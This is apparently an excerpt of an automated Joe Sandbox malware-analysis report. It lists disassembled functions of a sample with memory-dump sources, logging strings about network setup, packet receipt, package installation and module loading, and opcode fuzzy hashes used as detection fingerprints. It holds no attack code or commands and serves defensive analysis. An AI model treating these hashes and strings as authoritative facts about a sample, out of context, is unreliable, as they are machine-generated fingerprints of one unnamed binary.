                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Startupfflushfwrite
                                                                                                                                                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                                                                                                  • API String ID: 3771387389-898331216
                                                                                                                                                  • Opcode ID: a26de81fc8445dc42c5ba4472ba58619277b91e3ccb05bf8742dbed8f743adb0
                                                                                                                                                  • Instruction ID: 63214778dc4ae82594cbb90f9f7f2f58423604ba7d17166605554c248d60c0b4
                                                                                                                                                  • Opcode Fuzzy Hash: a26de81fc8445dc42c5ba4472ba58619277b91e3ccb05bf8742dbed8f743adb0
                                                                                                                                                  • Instruction Fuzzy Hash: 21F01D62F1848391FB15DF1DE8857F56312EF107C4F858872DA0D866A6FE2CE54AB300
                                                                                                                                                  Function 00007FF8BFB52F1E Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Startupfflushfwrite
                                                                                                                                                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                                                                                                  • API String ID: 3771387389-898331216
                                                                                                                                                  • Opcode ID: b8168152bed2fe7015a620b0f98054066fbf806d0659ad2a0f81c7eb32b1367f
                                                                                                                                                  • Instruction ID: f0ea31f1393bbd3c6069edb4790f1a16193920fb1262d7ac86831144697b9986
                                                                                                                                                  • Opcode Fuzzy Hash: b8168152bed2fe7015a620b0f98054066fbf806d0659ad2a0f81c7eb32b1367f
                                                                                                                                                  • Instruction Fuzzy Hash: 78F01D64B09647A2FF109BA8F8547F8B310EF283C4F480032DA0D46A96EE2CF5998740
                                                                                                                                                  Function 00007FF8BFB31FCE Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Startupfflushfwrite
                                                                                                                                                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                                                                                                  • API String ID: 3771387389-898331216
                                                                                                                                                  • Opcode ID: 55581a1a9876ac671bbe8439d1a613f18c012bce2b1d742a23fc00ce54db1969
                                                                                                                                                  • Instruction ID: 4edcf4329ae0c1f1ff12667111124a2face968f4debc2e174b5126f05e16bd82
                                                                                                                                                  • Opcode Fuzzy Hash: 55581a1a9876ac671bbe8439d1a613f18c012bce2b1d742a23fc00ce54db1969
                                                                                                                                                  • Instruction Fuzzy Hash: 81F0B4A0B8D50791FF109BDCE9013F42354AF107C0F844032CB0D4A5A6EE2DE548E701
                                                                                                                                                  Function 00007FF8BFB824AE Relevance: 10.5, APIs: 1, Strings: 5, Instructions: 26networkCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Startupfflushfwrite
                                                                                                                                                  • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> WSAStartup failed(ret=%d)$[I] (%s) -> %s$net_init
                                                                                                                                                  • API String ID: 3771387389-898331216
                                                                                                                                                  • Opcode ID: 6874982133632a7ce170ad8de51c3a9715c6612822ec66ea62388de5787a52fb
                                                                                                                                                  • Instruction ID: f6bb3900cc5fa06af7d005c086b550636cc520a7a578f6d5ee7aeefdd211cabe
                                                                                                                                                  • Opcode Fuzzy Hash: 6874982133632a7ce170ad8de51c3a9715c6612822ec66ea62388de5787a52fb
                                                                                                                                                  • Instruction Fuzzy Hash: 87F03A60B0A507D5FB14ABDCE8447F46351AF903C4F44C432DB0D8A6ABEE1CE649C310
                                                                                                                                                  Function 00007FF8BFB83AFD Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 127sleepCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Sleep
                                                                                                                                                  • String ID: /$[W] (%s) -> Not a valid event received(size=%u,suid=%llx,packed_event_sz=%u,event_sz=%u)$[W] (%s) -> Not a valid packet received(size=%u,suid=%llx)$routine_rx
                                                                                                                                                  • API String ID: 3472027048-1600310168
                                                                                                                                                  • Opcode ID: c53c2ae821d90da87844032103b56b71391d742219771a0656b4b1393a371080
                                                                                                                                                  • Instruction ID: aeeecdef5614607cbd047c1b8e56cd6fa7201cb0db8a5aaa538225dac1b71d08
                                                                                                                                                  • Opcode Fuzzy Hash: c53c2ae821d90da87844032103b56b71391d742219771a0656b4b1393a371080
                                                                                                                                                  • Instruction Fuzzy Hash: 4B515F66E0D64385FA609B9CE8803B96391EFC43E4F588231D7AD466D6DF2CE855C700
                                                                                                                                                  Function 00007FF6BE03836F Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$HandleModule_mbscpy
                                                                                                                                                  • String ID: [E] (%s) -> Failed(pkg_path=%s,tgt_path=%s,err=%08x)$[I] (%s) -> Done(pkg_path=%s,tgt_path=%s)$package_install$service
                                                                                                                                                  • API String ID: 3656010895-1379287937
                                                                                                                                                  • Opcode ID: 4b1288cd24698f13a6b3948ac59b53d7aab4a4e5bdf7d96b3b3cf1ccf810a908
                                                                                                                                                  • Instruction ID: 6933cbc51d3ba47562ae8e96c136b8df764b53078fc9b83f94a52159076a6f1b
                                                                                                                                                  • Opcode Fuzzy Hash: 4b1288cd24698f13a6b3948ac59b53d7aab4a4e5bdf7d96b3b3cf1ccf810a908
                                                                                                                                                  • Instruction Fuzzy Hash: 63317532A0CA8791EB319B58E8807EA6361EBAC344F901532F74DCB6D9DE7DD519C740
                                                                                                                                                  Function 00007FF6BE031613 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,00000000,000002234F5413D0,?,00007FF6BE03941F), ref: 00007FF6BE031633
                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,000002234F5413D0,?,00007FF6BE03941F), ref: 00007FF6BE031666
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                                                  • API String ID: 1224403792-3063791425
                                                                                                                                                  • Opcode ID: 0ad8ead994b4c2e9daff84b653723ad2f9de5381132992f99bfddf63ec3bb5bb
                                                                                                                                                  • Instruction ID: 6ba57a1e0a44dd4f6c9bcd843d7dc9de91120ac5fd7b19198d3a11902da39a29
                                                                                                                                                  • Opcode Fuzzy Hash: 0ad8ead994b4c2e9daff84b653723ad2f9de5381132992f99bfddf63ec3bb5bb
                                                                                                                                                  • Instruction Fuzzy Hash: 99F08691A0D60742FA61974DAA009A96232AF7CBC4F584133EE4D9B799EE2CD6668300
                                                                                                                                                  Function 00007FF8BA4F9F73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                                                  • API String ID: 1224403792-3063791425
                                                                                                                                                  • Opcode ID: c036b7072d391179714a13b79d8b8b11ab5854fb510460520e8d13921a022d51
                                                                                                                                                  • Instruction ID: 85d1c0114c475c3cb7f91fca44d1a9487cedd14a7f907dcaa8527677fa88f005
                                                                                                                                                  • Opcode Fuzzy Hash: c036b7072d391179714a13b79d8b8b11ab5854fb510460520e8d13921a022d51
                                                                                                                                                  • Instruction Fuzzy Hash: BDF08150B0DA0392FA215B9DBC405B96755BF05BC0F489175DF4D0B7A9EF2DE7468310
                                                                                                                                                  Function 00007FF8B915CF13 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158091881.00007FF8B9150000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158135563.00007FF8B9164000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158157688.00007FF8B916D000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158178663.00007FF8B9170000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158210121.00007FF8B9171000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                                                  • API String ID: 1224403792-3063791425
                                                                                                                                                  • Opcode ID: 8500f81bbe417212a047b71eb08b57ae0d8934d82496b1388f00adba82d6eef3
                                                                                                                                                  • Instruction ID: a0d3e14684ce60c442c6588e1570c75b32d2bee1be4b590268df4a59fd05547b
                                                                                                                                                  • Opcode Fuzzy Hash: 8500f81bbe417212a047b71eb08b57ae0d8934d82496b1388f00adba82d6eef3
                                                                                                                                                  • Instruction Fuzzy Hash: 6BF0A490E097C382FA565F5EE8101B96351AF45FC4F558132EE4D4B799EF2CE686A300
                                                                                                                                                  Function 00007FF8B9181A23 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158234398.00007FF8B9180000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158275451.00007FF8B9196000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158294860.00007FF8B91A0000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158311467.00007FF8B91A3000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158327489.00007FF8B91A4000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                                                  • API String ID: 1224403792-3063791425
                                                                                                                                                  • Opcode ID: 7b9909d9e40ec3fb382d97b107a8795d681622530cbf96aad0c3b5d9fcd7d944
                                                                                                                                                  • Instruction ID: 2d8d8db9d16b8e6589db55cf7037a1ec71be57f06d158bcd65a6be841bdbc603
                                                                                                                                                  • Opcode Fuzzy Hash: 7b9909d9e40ec3fb382d97b107a8795d681622530cbf96aad0c3b5d9fcd7d944
                                                                                                                                                  • Instruction Fuzzy Hash: E5F0D191A086C3A2FA028F8DE8402B563526F04BD4F15C031CE4D4B799FE2CEA47B310
                                                                                                                                                  Function 00007FF8BFB520F3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158612916.00007FF8BFB50000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158658328.00007FF8BFB62000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158682587.00007FF8BFB6B000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158717664.00007FF8BFB6E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158748673.00007FF8BFB6F000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158773276.00007FF8BFB72000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                                                  • API String ID: 1224403792-3063791425
                                                                                                                                                  • Opcode ID: 27f23b630b3fee3274bf3a028bcd2db1b972005ed87ce814cecee143b722bf30
                                                                                                                                                  • Instruction ID: fae7ac3dbad79c597fe4d217e641ad54cc7271e936c11fb84b882320d7f2aae3
                                                                                                                                                  • Opcode Fuzzy Hash: 27f23b630b3fee3274bf3a028bcd2db1b972005ed87ce814cecee143b722bf30
                                                                                                                                                  • Instruction Fuzzy Hash: 8FF08CA0A0A747A2FE11AB8DFC101AAB3116F14BC4F084131DF4D4BFA9EE3CE5968304
                                                                                                                                                  Function 00007FF8BFB373F3 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158487373.00007FF8BFB30000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158530509.00007FF8BFB40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158550873.00007FF8BFB48000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158571573.00007FF8BFB4B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158593544.00007FF8BFB4C000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                                                  • API String ID: 1224403792-3063791425
                                                                                                                                                  • Opcode ID: 872c14c2b4ad4861cf5742ee842d8f6257a05eca4937ccb7efe48da9e016fe22
                                                                                                                                                  • Instruction ID: 06c13dcead6e9b31be2c21aa9eb28e2dc52454428e79bb9edf8f14a4d1efa9ee
                                                                                                                                                  • Opcode Fuzzy Hash: 872c14c2b4ad4861cf5742ee842d8f6257a05eca4937ccb7efe48da9e016fe22
                                                                                                                                                  • Instruction Fuzzy Hash: 44F0F451B8C70752FA01ABCEA9011B5A3266F04BC0F2C4132CF5C0B799EE2CE5469300
                                                                                                                                                  Function 00007FF8BFB84423 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 38libraryloaderCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressErrorLastProcfflushfwrite
                                                                                                                                                  • String ID: [D] (%s) -> Done(hnd=0x%p,name=%s,ret=0x%p)$[E] (%s) -> Failed(hnd=0x%p,name=%s,gle=%lu)$module_get_proc
                                                                                                                                                  • API String ID: 1224403792-3063791425
                                                                                                                                                  • Opcode ID: 68bf0edd847036089264eecb137d1ff2ce4657a0f68d27ac68f5b67825259f4b
                                                                                                                                                  • Instruction ID: 9f70e605161bd8623a0eaa56368520d6a4881b57f18ce1d1a9cb370e472f958a
                                                                                                                                                  • Opcode Fuzzy Hash: 68bf0edd847036089264eecb137d1ff2ce4657a0f68d27ac68f5b67825259f4b
                                                                                                                                                  • Instruction Fuzzy Hash: C0F08190A4E60781FA159BDDBC045B563916F84BD4F089131DE5D4B7A9EF2CE546C300
                                                                                                                                                  Function 00007FF8BA4F9FF4 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 28libraryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastLibraryLoadfflushfwrite
                                                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,gle=%lu)$[I] (%s) -> Done(name=%s,ret=0x%p)$module_load
                                                                                                                                                  • API String ID: 4085810780-3386190286
                                                                                                                                                  • Opcode ID: fd51d1cbaee2ddb6301145fafeb239ad102a1964c430bb25295e8db6dcc54a2a
                                                                                                                                                  • Instruction ID: 7961175255b25e872bfb882bcbf3620712fc018bd39c3463f9808b669941953f
                                                                                                                                                  • Opcode Fuzzy Hash: fd51d1cbaee2ddb6301145fafeb239ad102a1964c430bb25295e8db6dcc54a2a
